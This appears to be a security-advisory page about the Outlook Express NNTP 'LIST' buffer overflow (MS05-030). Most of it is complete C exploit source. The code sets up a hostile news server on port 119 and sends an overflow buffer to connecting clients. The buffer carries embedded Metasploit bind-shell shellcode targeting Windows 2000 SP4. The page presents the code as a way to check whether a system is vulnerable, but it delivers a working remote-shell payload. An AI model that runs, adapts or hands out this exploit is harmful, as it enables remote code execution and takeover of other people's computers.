|
|
|
|
| |
| The NNTP news reader embedded in Outlook Express is vulnerable to buffer overflow, exploiting this vulnerability allows remote attacker to execute malicious code with the rights of Outlook's user. The following exploit code can be used to determine whether you are vulnerable or not.
|
| |
Credit:
The information has been provided by eyas.
The original article can be found at: http://www.xfocus.net
|
| |
Vulnerability details:
Microsoft Outlook Express NNTP "LIST" Buffer Overflow (MS05-030)
Cumulative Security Update of Outlook Express (MS05-030)
Exploit:
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32")
/* win32_bind - EXITFUNC=process LPORT=4444 Size=344
Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x96"
"\x27\xc8\x3e\x83\xeb\xfc\xe2\xf4\x6a\x4d\x23\x73\x7e\xde\x37\xc1"
"\x69\x47\x43\x52\xb2\x03\x43\x7b\xaa\xac\xb4\x3b\xee\x26\x27\xb5"
"\xd9\x3f\x43\x61\xb6\x26\x23\x77\x1d\x13\x43\x3f\x78\x16\x08\xa7"
"\x3a\xa3\x08\x4a\x91\xe6\x02\x33\x97\xe5\x23\xca\xad\x73\xec\x16"
"\xe3\xc2\x43\x61\xb2\x26\x23\x58\x1d\x2b\x83\xb5\xc9\x3b\xc9\xd5"
"\x95\x0b\x43\xb7\xfa\x03\xd4\x5f\x55\x16\x13\x5a\x1d\x64\xf8\xb5"
"\xd6\x2b\x43\x4e\x8a\x8a\x43\x7e\x9e\x79\xa0\xb0\xd8\x29\x24\x6e"
"\x69\xf1\xae\x6d\xf0\x4f\xfb\x0c\xfe\x50\xbb\x0c\xc9\x73\x37\xee"
"\xfe\xec\x25\xc2\xad\x77\x37\xe8\xc9\xae\x2d\x58\x17\xca\xc0\x3c"
"\xc3\x4d\xca\xc1\x46\x4f\x11\x37\x63\x8a\x9f\xc1\x40\x74\x9b\x6d"
"\xc5\x74\x8b\x6d\xd5\x74\x37\xee\xf0\x4f\xd9\x62\xf0\x74\x41\xdf"
"\x03\x4f\x6c\x24\xe6\xe0\x9f\xc1\x40\x4d\xd8\x6f\xc3\xd8\x18\x56"
"\x32\x8a\xe6\xd7\xc1\xd8\x1e\x6d\xc3\xd8\x18\x56\x73\x6e\x4e\x77"
"\xc1\xd8\x1e\x6e\xc2\x73\x9d\xc1\x46\xb4\xa0\xd9\xef\xe1\xb1\x69"
"\x69\xf1\x9d\xc1\x46\x41\xa2\x5a\xf0\x4f\xab\x53\x1f\xc2\xa2\x6e"
"\xcf\x0e\x04\xb7\x71\x4d\x8c\xb7\x74\x16\x08\xcd\x3c\xd9\x8a\x13"
"\x68\x65\xe4\xad\x1b\x5d\xf0\x95\x3d\x8c\xa0\x4c\x68\x94\xde\xc1"
"\xe3\x63\x37\xe8\xcd\x70\x9a\x6f\xc7\x76\xa2\x3f\xc7\x76\x9d\x6f"
"\x69\xf7\xa0\x93\x4f\x22\x06\x6d\x69\xf1\xa2\xc1\x69\x10\x37\xee"
"\x1d\x70\x34\xbd\x52\x43\x37\xe8\xc4\xd8\x18\x56\xe8\xff\x2a\x4d"
"\xc5\xd8\x1e\xc1\x46\x27\xc8\x3e";
struct
{
DWORD dwJMPEBX;
char *szDescription;
}targets[] =
{
{0x7803382b, "win2k sp4 all language"}
},v;
void usage(char *p)
{
int i;
printf( "Usage: %s <type>\n"
"[type]\n", p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("%d\t%s\n", i, targets[i].szDescription);
}
}
void main(int argc, char **argv)
{
struct sockaddr_in server,client;
WSADATA wsd;
SOCKET s2,s3;
int ret;
char szRecvBuff[0x100];
char szSend[] = "200\r\n";
int i,iType;
char szEvil[0x3000], szTmp[0x10];
printf( "MS OE NNTP \"LIST\" Buffer Overflow (MS05-030) EXP\n"
"Credits: Bug found by iDEFENSE\n"
"coded by eyas < eyas at xfocus.org>\n"
"http://www.xfocus.net\n\n");
if(argc!=2)
{
usage(argv[0]);
return;
}
iType = atoi(argv[1]);
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
return;
}
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(119);
server.sin_addr.s_addr= 0;
ret = bind(s2, (struct sockaddr *)&server, sizeof(server));
ret = listen(s2, 100);
printf("[+] Listen on TCP 119.\n");
while(1)
{
ret=sizeof(client);
s3 = accept(s2, (struct sockaddr *)&client, &ret);
printf("[+] Connection accepted from %s:%d\n",
inet_ntoa(client.sin_addr), ntohs(client.sin_port));
printf("[+] Send welcome information.\n");
send(s3, szSend, strlen(szSend), 0);
ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-1] = '\x0';
printf("[+] Recv: [%s]\n", szRecvBuff);
send(s3, szSend, strlen(szSend), 0);
printf("[+] Send response.\n");
ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-4] = '\x0';
printf("[+] Recv: [%s]\n", szRecvBuff);
printf("[+] send evil buff.\n");
strcpy(szTmp, "\xEB\x06\xEB\x06");
memcpy(&szTmp[4], &(targets[iType].dwJMPEBX),4);
szTmp[8]='\x0';
strcpy(szEvil, "215 list\r\ngroup aaaa");
//for(i=0;i<0x2598;i++)
//for(i=0;i<0x30;i++)
for(i=0;i<0x2598+0x200;i+=8)
strcat(szEvil, szTmp);
strcat(szEvil, (char *)scode);
strcat(szEvil, " 1 y\r\n.\r\n");
send(s3, szEvil, strlen(szEvil), 0);
Sleep(1000);
closesocket(s3);
printf("[+] close connection\n");
}
WSACleanup();
return;
}
|
|
|
